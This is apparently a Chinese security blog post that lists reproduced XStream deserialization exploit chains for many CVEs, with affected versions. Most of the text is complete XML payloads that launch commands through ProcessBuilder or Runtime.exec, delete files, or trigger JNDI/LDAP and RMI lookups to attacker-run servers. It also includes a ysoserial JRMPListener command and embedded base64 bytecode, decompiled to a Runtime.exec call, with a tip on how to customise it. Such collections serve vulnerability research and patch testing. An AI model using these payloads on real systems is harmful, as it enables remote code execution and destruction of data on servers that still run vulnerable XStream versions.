首先看一下XStream基本语法.
package org.example; import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver; import java.io.FileInputStream;
import java.io.IOException; public class Main { public static void main(String[] args) throws IOException { FileInputStream fileInputStream = new FileInputStream("1.xml"); XStream xStream = new XStream(new DomDriver()); xStream.fromXML(fileInputStream); }
}
下面是复现成功的一部分链子.
sorted-set链
CVE-2013-7258
适用版本1.4.5,1.4.6,1.4.10
<sorted-set><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder"><command><string>calc</string></command></target><action>start</action></handler></dynamic-proxy>
</sorted-set>
tree-map链
适用版本<=1.4.6或=1.4.10
<tree-map><entry><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder"><command><string>calc</string></command></target><action>start</action></handler></dynamic-proxy><string>good</string></entry>
</tree-map>
sorted-set出网链
CVE-2021-21351
适用版本<=1.4.15
<sorted-set><javax.naming.ldap.Rdn_-RdnEntry><type>ysomap</type><value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'><m__DTMXRTreeFrag><m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'><m__size>-10086</m__size><m__mgrDefault><__useServicesMechanism>false</__useServicesMechanism><m__incremental>false</m__incremental><m__source__location>false</m__source__location><m__dtms><null/></m__dtms><m__defaultHandler/></m__mgrDefault><m__shouldStripWS>false</m__shouldStripWS><m__indexing>false</m__indexing><m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'><fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'><javax.sql.rowset.BaseRowSet><default><concurrency>1008</concurrency><escapeProcessing>true</escapeProcessing><fetchDir>1000</fetchDir><fetchSize>0</fetchSize><isolation>2</isolation><maxFieldSize>0</maxFieldSize><maxRows>0</maxRows><queryTimeout>0</queryTimeout><readOnly>true</readOnly><rowSetType>1004</rowSetType><showDeleted>false</showDeleted><dataSource>ldap://127.0.0.1:1389/Basic/Command/calc</dataSource><listeners/><params/></default></javax.sql.rowset.BaseRowSet><com.sun.rowset.JdbcRowSetImpl><default/></com.sun.rowset.JdbcRowSetImpl></fPullParserConfig><fConfigSetInput><class>com.sun.rowset.JdbcRowSetImpl</class><name>setAutoCommit</name><parameter-types><class>boolean</class></parameter-types></fConfigSetInput><fConfigParse reference='../fConfigSetInput'/><fParseInProgress>false</fParseInProgress></m__incrementalSAXSource><m__walker><nextIsRaw>false</nextIsRaw></m__walker><m__endDocumentOccured>false</m__endDocumentOccured><m__idAttributes/><m__textPendingStart>-1</m__textPendingStart><m__useSourceLocationProperty>false</m__useSourceLocationProperty><m__pastFirstElement>false</m__pastFirstElement></m__dtm><m__dtmIdentity>1</m__dtmIdentity></m__DTMXRTreeFrag><m__dtmRoot>1</m__dtmRoot><m__allowRelease>false</m__allowRelease></value></javax.naming.ldap.Rdn_-RdnEntry><javax.naming.ldap.Rdn_-RdnEntry><type>ysomap</type><value class='com.sun.org.apache.xpath.internal.objects.XString'><m__obj class='string'>test</m__obj></value></javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
map链
CVE-2020-26217
适用版本<=1.4.13
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'><dataHandler><dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'><contentType>text/plain</contentType><is class='java.io.SequenceInputStream'><e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'><iterator class='javax.imageio.spi.FilterIterator'><iter class='java.util.ArrayList$Itr'><cursor>0</cursor><lastRet>-1</lastRet><expectedModCount>1</expectedModCount><outer-class><java.lang.ProcessBuilder><command><string>calc</string></command></java.lang.ProcessBuilder></outer-class></iter><filter class='javax.imageio.ImageIO$ContainsFilter'><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>start</name></filter><next/></iterator><type>KEYS</type></e><in class='java.io.ByteArrayInputStream'><buf></buf><pos>0</pos><mark>0</mark><count>0</count></in></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><string>test</string></entry>
</map>
map文件删除链
CVE-2020-26259
适用版本<=1.4.14
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'><dataHandler><dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'><contentType>text/plain</contentType><is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'><tempFile>D:\\hello.txt</tempFile></is></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><string>test</string></entry>
</map>
priorityquine出网链
CVE-2021-21344
适用版本<=1.4.15
<java.util.PriorityQueue serialization='custom'><unserializable-parents/><java.util.PriorityQueue><default><size>2</size><comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'><indexMap class='com.sun.xml.internal.ws.client.ResponseContext'><packet><message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'><dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'><bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'><bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'><bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'><jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType><uriProperties/><attributeProperties/><inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'><getter><class>com.sun.rowset.JdbcRowSetImpl</class><name>getDatabaseMetaData</name><parameter-types/></getter></inheritedAttWildcard></bi><tagName/><context><marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'><outer-class reference='../..'/></marshallerPool><nameList><nsUriCannotBeDefaulted><boolean>true</boolean></nsUriCannotBeDefaulted><namespaceURIs><string>1</string></namespaceURIs><localNames><string>UTF-8</string></localNames></nameList></context></bridge></bridge><jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'><javax.sql.rowset.BaseRowSet><default><concurrency>1008</concurrency><escapeProcessing>true</escapeProcessing><fetchDir>1000</fetchDir><fetchSize>0</fetchSize><isolation>2</isolation><maxFieldSize>0</maxFieldSize><maxRows>0</maxRows><queryTimeout>0</queryTimeout><readOnly>true</readOnly><rowSetType>1004</rowSetType><showDeleted>false</showDeleted><dataSource>ldap://127.0.0.1:9999/Evil</dataSource><params/></default></javax.sql.rowset.BaseRowSet><com.sun.rowset.JdbcRowSetImpl><default><iMatchColumns><int>-1</int><int>-1</int><int>-1</int><int>-1</int><int>-1</int><int>-1</int><int>-1</int><int>-1</int><int>-1</int><int>-1</int></iMatchColumns><strMatchColumns><string>foo</string><null/><null/><null/><null/><null/><null/><null/><null/><null/></strMatchColumns></default></com.sun.rowset.JdbcRowSetImpl></jaxbObject></dataSource></message><satellites/><invocationProperties/></packet></indexMap></comparator></default><int>3</int><string>javax.xml.ws.binding.attachments.inbound</string><string>javax.xml.ws.binding.attachments.inbound</string></java.util.PriorityQueue>
</java.util.PriorityQueue>
priorityquine不出网链
CVE-2021-21345
适用版本<=1.4.15
<java.util.PriorityQueue serialization='custom'><unserializable-parents/><java.util.PriorityQueue><default><size>2</size><comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'><indexMap class='com.sun.xml.internal.ws.client.ResponseContext'><packet><message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'><dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'><bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'><bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'><bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'><jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType><uriProperties/><attributeProperties/><inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'><getter><class>com.sun.corba.se.impl.activation.ServerTableEntry</class><name>verify</name><parameter-types/></getter></inheritedAttWildcard></bi><tagName/><context><marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'><outer-class reference='../..'/></marshallerPool><nameList><nsUriCannotBeDefaulted><boolean>true</boolean></nsUriCannotBeDefaulted><namespaceURIs><string>1</string></namespaceURIs><localNames><string>UTF-8</string></localNames></nameList></context></bridge></bridge><jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'><activationCmd>calc</activationCmd></jaxbObject></dataSource></message><satellites/><invocationProperties/></packet></indexMap></comparator></default><int>3</int><string>javax.xml.ws.binding.attachments.inbound</string><string>javax.xml.ws.binding.attachments.inbound</string></java.util.PriorityQueue>
</java.util.PriorityQueue>
priorityquine RMI注入
CVE-2021-29505
适用版本<=1.4.16
这个payload比较特殊,只能打RMI注入,而且不能指定路由.我找了半天也没找到能自定义命令进行RMIcodebase注入的工具.好在RMIcodebase注入能使用的版本较低,一般都是配合链子去打.添加一个cc1链的依赖,在ysoserial中起一个恶意的RMIserver.
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 3333 CommonsCollections1 "Calc"
poc如下
<java.util.PriorityQueue serialization='custom'><unserializable-parents/><java.util.PriorityQueue><default><size>2</size></default><int>3</int><javax.naming.ldap.Rdn_-RdnEntry><type>12345</type><value class='com.sun.org.apache.xpath.internal.objects.XString'><m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj></value></javax.naming.ldap.Rdn_-RdnEntry><javax.naming.ldap.Rdn_-RdnEntry><type>12345</type><value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'><message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'><parsedMessage>true</parsedMessage><soapVersion>SOAP_11</soapVersion><bodyParts/><sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'><attachmentsInitialized>false</attachmentsInitialized><nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'><aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'><candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'><names><string>aa</string><string>aa</string></names><ctx><environment/><registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'><java.rmi.server.RemoteObject><string>UnicastRef</string><string>127.0.0.1</string><int>3333</int><long>0</long><int>0</int><long>0</long><short>0</short><boolean>false</boolean></java.rmi.server.RemoteObject></registry><host>127.0.0.1</host><port>3333</port></ctx></candidates></aliases></nullIter></sm></message></value></javax.naming.ldap.Rdn_-RdnEntry></java.util.PriorityQueue>
</java.util.PriorityQueue>
priorityquine1.4.17链
CVE-2021-39144
适用版本<=1.4.17
<java.util.PriorityQueue serialization='custom'><unserializable-parents/><java.util.PriorityQueue><default><size>2</size></default><int>3</int><dynamic-proxy><interface>java.lang.Comparable</interface><handler class='sun.tracing.NullProvider'><active>true</active><providerType>java.lang.Comparable</providerType><probes><entry><method><class>java.lang.Comparable</class><name>compareTo</name><parameter-types><class>java.lang.Object</class></parameter-types></method><sun.tracing.dtrace.DTraceProbe><proxy class='java.lang.Runtime'/><implementing__method><class>java.lang.Runtime</class><name>exec</name><parameter-types><class>java.lang.String</class></parameter-types></implementing__method></sun.tracing.dtrace.DTraceProbe></entry></probes></handler></dynamic-proxy><string>calc</string></java.util.PriorityQueue>
</java.util.PriorityQueue>
sorted-set1.4.17出网链
CVE-2021-39146
<sorted-set><javax.naming.ldap.Rdn_-RdnEntry><type>test</type><value class='javax.swing.MultiUIDefaults' serialization='custom'><unserializable-parents/><hashtable><default><loadFactor>0.75</loadFactor><threshold>525</threshold></default><int>700</int><int>0</int></hashtable><javax.swing.UIDefaults><default><defaultLocale>zh_CN</defaultLocale><resourceCache/></default></javax.swing.UIDefaults><javax.swing.MultiUIDefaults><default><tables><javax.swing.UIDefaults serialization='custom'><unserializable-parents/><hashtable><default><loadFactor>0.75</loadFactor><threshold>525</threshold></default><int>700</int><int>1</int><string>lazyValue</string><javax.swing.UIDefaults_-ProxyLazyValue><className>javax.naming.InitialContext</className><methodName>doLookup</methodName><args><string>ldap://127.0.0.1:1389/Basic/Command/calc</string></args></javax.swing.UIDefaults_-ProxyLazyValue></hashtable><javax.swing.UIDefaults><default><defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/><resourceCache/></default></javax.swing.UIDefaults></javax.swing.UIDefaults></tables></default></javax.swing.MultiUIDefaults></value></javax.naming.ldap.Rdn_-RdnEntry><javax.naming.ldap.Rdn_-RdnEntry><type>test</type><value class='com.sun.org.apache.xpath.internal.objects.XString'><m__obj class='string'>test</m__obj></value></javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
linked-hash-set链
CVE-2021-39139
适用版本<=1.4.17
<linked-hash-set><dynamic-proxy><interface>map</interface><handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'><classToInvocationHandler class='linked-hash-map'/><defaultHandler class='sun.tracing.NullProvider'><active>true</active><providerType>java.lang.Object</providerType><probes><entry><method><class>java.lang.Object</class><name>hashCode</name><parameter-types/></method><sun.tracing.dtrace.DTraceProbe><proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'><com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl><default><__name>Pwnr</__name><__bytecodes><byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array><byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array></__bytecodes><__transletIndex>-1</__transletIndex><__indentNumber>0</__indentNumber></default><boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl></proxy><implementing__method><class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class><name>getOutputProperties</name><parameter-types/></implementing__method></sun.tracing.dtrace.DTraceProbe></entry></probes></defaultHandler></handler></dynamic-proxy>
</linked-hash-set>
我们对两段字节码去进行还原
package ysoserial.payloads.util;import java.io.Serializable;public class Gadgets$Foo implements Serializable {private static final long serialVersionUID = 8207363842866235160L;public Gadgets$Foo() {}
}
package ysoserial;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.Serializable;public class Pwner416592915180600 extends AbstractTranslet implements Serializable {private static final long serialVersionUID = -5971610431559700674L;public Pwner416592915180600() {}public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}static {Object var1 = null;Runtime.getRuntime().exec("calc.exe");}
}
我们修改的时候只需要去修改第二段即可.
XStream1.4.18及以后
从这个版本开始就没有命令执行漏洞了,只存在一些dos的洞,而且利用条件非常苛刻.
